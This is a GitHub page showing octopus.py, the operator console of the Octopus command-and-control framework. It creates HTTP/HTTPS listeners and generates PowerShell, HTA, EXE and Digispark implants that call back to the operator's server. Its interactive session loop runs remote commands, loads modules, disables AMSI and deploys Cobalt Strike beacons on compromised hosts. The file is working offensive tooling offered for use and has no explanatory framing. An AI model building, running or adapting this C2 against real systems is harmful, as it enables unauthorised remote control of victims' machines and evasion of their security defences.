forked from mhaskar/Octopus
-
Notifications
You must be signed in to change notification settings - Fork 0
/
octopus.py
executable file
·340 lines (295 loc) · 13.8 KB
/
octopus.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
#!/usr/bin/python
import threading
import readline
import time
import base64
import sys
import os
import signal
from termcolor import colored
from core.functions import *
from core.weblistener import *
from flask import *
from profile import *
import logging
python_version = sys.version_info[0]
if python_version != 3:
print(colored("[-] Unable to run Octopus", "red"))
print(colored("[-] Please run Octopus with python 3", "red"))
sys.exit()
listeners=NewListener()
def ctrlc(sig, frame):
pass
signal.signal(signal.SIGINT, ctrlc)
if not os.path.isfile(".oct_history"):
open('.oct_history', 'a').close()
else:
readline.read_history_file(".oct_history")
banner()
while True:
readline.set_completer(completer)
readline.parse_and_bind("tab: complete")
readline.write_history_file(".oct_history")
try:
command = input("\033[4mOctopus\033[0m"+colored(" >>", "green"))
# readline.write_history_file(".console_history.oct")
if command == "list":
list_sessions()
if command == "history":
get_history()
if command == "help":
main_help_banner()
if command == "listeners":
list_listeners()
if command.split(" ")[0] == "delete":
try:
session = connections_information[int(command.split(" ")[1])]
delete(session[2], int(command.split(" ")[1]))
except:
print(colored("[-] Wrong listener selected !", "red"))
continue
# delete_listener
# TBD
# if command.split(" ")[0] == "delete_listener":
# listener = listeners_information[int(command.split(" ")[1])]
# delete(listener[0], int(command.split(" ")[1]))
if command == "clear":
os.system("clear")
if command == "exit":
exit()
if command.split(" ")[0] == "generate_powershell":
try:
listener = command.split(" ")[1]
except IndexError:
print(colored("[-] Please select a listener !", "red"))
print(colored("Syntax : generate_powershell listener_name", "green"))
print(colored("Example : generate_powershell listener1", "yellow"))
continue
try:
hostname = listeners_information[listener][3]+":"+str(listeners_information[listener][2])
interval = listeners_information[listener][4]
path = listeners_information[listener][5]
proto = listeners_information[listener][6]
# check if protocol is True then https is used
if proto:
proto_to_use = "https"
else:
proto_to_use = "http"
generate(hostname, path, proto_to_use, interval)
except KeyError:
print(colored("[-] Wrong listener selected !", "red"))
continue
if command.split(" ")[0] == "delete_listener":
try:
listener = command.split(" ")[1]
delete_listener(listener)
except KeyError:
print(colored("[-] Wrong listener selected !", "red"))
continue
if command.split(" ")[0] == "generate_hta":
try:
listener = command.split(" ")[1]
except IndexError:
print(colored("[-] Please select a listener !", "red"))
print(colored("Syntax : generate_hta listener_name", "green"))
print(colored("Example : generate_hta listener1", "yellow"))
continue
try:
host_ip = listeners_information[listener][3]
bind_port=listeners_information[listener][2]
path = listeners_information[listener][5]
proto = listeners_information[listener][6]
# check if protocol is True then https is used
if proto:
proto_to_use = "https"
else:
proto_to_use = "http"
listeners.create_hta()
generate_hta(host_ip,bind_port,proto_to_use)
except KeyError:
print(colored("[-] Wrong listener selected !", "red"))
continue
if command.split(" ")[0] == "generate_exe":
try:
listener = command.split(" ")[1]
exe_path = command.split(" ")[2]
except IndexError:
print(colored("[-] Please select a listener and check your options !", "red"))
print(colored("Syntax : generate_exe listener_name output_path", "green"))
print(colored("Example : generate_exe listener1 /opt/Octopus/file.exe", "yellow"))
continue
try:
hostname = listeners_information[listener][3]+":"+str(listeners_information[listener][2])
path = listeners_information[listener][5]
proto = listeners_information[listener][6]
# check if protocol is True then https is used
if proto:
proto_to_use = "https"
else:
proto_to_use = "http"
generate_exe(hostname, path, proto_to_use, exe_path)
except KeyError:
print(colored("[-] Wrong listener selected !", "red"))
continue
# generate_digispark
if command.split(" ")[0] == "generate_digispark":
try:
listener = command.split(" ")[1]
ino_path = command.split(" ")[2]
except IndexError:
print(colored("[-] Please select a listener and check your options !", "red"))
print(colored("Syntax : generate_digispark listener_name output_path", "green"))
print(colored("Example : generate_digispark listener1 /opt/Octopus/file.ino", "yellow"))
continue
try:
hostname = listeners_information[listener][3]+":"+str(listeners_information[listener][2])
path = listeners_information[listener][5]
proto = listeners_information[listener][6]
# check if protocol is True then https is used
if proto:
proto_to_use = "https"
else:
proto_to_use = "http"
generate_digispark(hostname, path, proto_to_use, ino_path)
except KeyError:
print(colored("[-] Wrong listener selected !", "red"))
continue
if command.split(" ")[0] == "interact":
readline.set_completer(completer_interact)
readline.parse_and_bind("tab: complete")
try:
session = connections_information[int(command.split(" ")[1])]
except:
print(colored("[-] Error interacting with host", "red"))
continue
while True:
try:
scommand = input("(%s) >> " % colored(session[2], "red"))
if scommand == "":
continue
elif scommand == "exit" or scommand == "back":
break
elif scommand == "help":
interact_help()
elif scommand == "clear":
os.system("clear")
elif scommand == "modules":
list_modules()
pass
elif scommand.split(" ")[0] == "load":
try:
module_name = scommand.split(" ")[1]
load_module(session[2], module_name)
pass
except IndexError:
print(colored("[+] Please select a module !"))
elif scommand.split(" ")[0] == "deploy_cobalt_beacon":
try:
beacon_path = scommand.split(" ")[1]
deploy_cobalt_beacon(session[2], beacon_path)
pass
except IndexError:
print(colored("[+] Please select a valid beacon path!", "red"))
elif scommand == "disable_amsi":
disable_amsi(session[2])
pass
else:
send_command(session[2], scommand)
except:
print(" ")
elif command.split(" ")[0] == "listen_http":
try:
# create new listeners for
ip = command.split(" ")[1]
try:
port = int(command.split(" ")[2])
except ValueError:
print(colored("[-] port should be number !", "red"))
continue
host = command.split(" ")[3]
try:
interval = int(command.split(" ")[4])
except ValueError:
print(colored("[-] interval should be number !", "red"))
continue
path = command.split(" ")[5]
listener_name = command.split(" ")[6]
if check_listener_name(listener_name):
if check_url(path):
listener = NewListener(
listener_name,
ip,
port,
host,
interval,
path
)
if check_listener_port(ip, port):
listener.start_listener()
listener.create_path()
listeners=listener
print(colored("[+]%s Listener has been created" % listener_name, "green"))
#else:
# print(colored("[-] Cannot use the same hostname for multiple urls", "red"))
#in order to make it global so we can use in other functions
else:
print(colored("[+] Port in use or you don't have permession to bind", "red"))
else:
print(colored("[-] URL name already used, please change it", "red"))
else:
print(colored("[-] Listener name already used, please change it", "red"))
except IndexError:
print(colored("[-] Please check listener arguments !", "red"))
print(colored("Syntax : listen_http BindIP BindPort hostname interval URL listener_name", "green"))
print(colored("Example (with domain) : listen_http 0.0.0.0 8080 myc2.live 5 comments.php op1_listener", "yellow"))
print(colored("Example (without domain) : listen_http 0.0.0.0 8080 172.0.1.3 5 profile.php op1_listener", "yellow"))
http_help_banner()
continue
elif command.split(" ")[0] == "listen_https":
try:
# create new listeners for
ip = command.split(" ")[1]
try:
port = int(command.split(" ")[2])
except ValueError:
print(colored("[-] port should be number !", "red"))
continue
host = command.split(" ")[3]
try:
interval = int(command.split(" ")[4])
except ValueError:
print(colored("[-] interval should be number !", "red"))
continue
path = command.split(" ")[5]
listener_name = command.split(" ")[6]
if check_listener_name(listener_name):
key_path = command.split(" ")[7]
cert_path = command.split(" ")[8]
if not os.path.isfile(cert_path) or not os.path.isfile(key_path):
print(colored("[-] Please check the certficate and key path", "red"))
else:
listener = NewListener(
listener_name,
ip,
port,
host,
interval,
path,
cert_path,
key_path
)
if check_listener_port(ip, port):
listener.start_listener()
listener.create_path()
print(colored("[+]%s Listener has been created" % listener_name, "green"))
else:
print(colored("[+] Port in use or you don't have permession to bind", "red"))
else:
print(colored("[-] Listener name already used, please change it", "red"))
except IndexError:
print(colored("[-] Please check listener arguments !", "red"))
print(colored("Syntax : listen_https BindIP BindPort hostname interval URL listener_name certficate_path key_path", "green"))
print(colored("Example (with domain) : listen_https 0.0.0.0 443 myc2.live 5 login.php op1_listener certs/cert.pem certs/key.pem", "yellow"))
continue
except EOFError:
print(" ")